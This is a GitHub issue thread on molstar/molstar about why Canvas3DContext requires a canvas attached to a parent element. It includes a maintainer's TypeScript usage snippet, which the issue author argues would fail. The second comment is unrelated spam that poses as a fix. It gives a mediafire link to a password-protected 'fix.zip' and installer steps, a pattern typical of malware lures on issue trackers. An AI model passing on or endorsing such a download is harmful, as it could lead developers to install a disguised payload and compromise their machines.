### ISSUE TITLE
Unable to use Canvas3DContext without parent element

### ISSUE THREAD

**Issue by bergwerf** [molstar/molstar#1241]
I was just wondering if it is a conscious design decision that the Canvas3DContext cannot be used on a canvas outside the DOM (or at least one that doesn't have a parentElement) because the InputObserver wants to attach a ResizeObserver to the parentElement. This also somewhat affects coding patterns, as a Canvas3DContext cannot be initialized before the canvas has been added to the DOM.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dsehnal** [comment]
Yes, this has been a conscious decision.

The usage pattern isn't all that difficult, you can do something like this:

```ts
async function create(parent: HTMLDivElement) {
  const canvas = document.createElement('canvas');
  Object.assign(canvas.style, { position: 'absolute', inset: 0 });
  const ctx3d = Canvas3DContext.fromCanvas(canvas);
  parent.appendChild(canvas);

  const plugin = await initPlugin({ parent, canvas, ctx3d });
  // ...

  return plugin;
}
```

The canvas can also be created outside the `create` function too. And it is possible to create the `div` inside create itself and just add/remove it whereever you need it across the app. Usually I wrap this functionality inside a class too and it's quite easy to make this work with any UI framework that allows you access to raw div elements (pretty much any library).

**Comment by bergwerf** [comment]
I think the above code should fail, the canvas needs to be appended to the parent before the Canvas3DContext is instantiated, otherwise the ResizeObserver cannot be attached. Certainly this is not critical, but in some scenario's it might be desirable to draw on a canvas without attaching it to the DOM (like in a worker). In such cases it would be sufficient to just create a dummy container. In my case I wanted to create a class that doesn't handle the logic of attaching the canvas to the DOM, just a utility wrapper around the canvas. I am fine using it like this though.
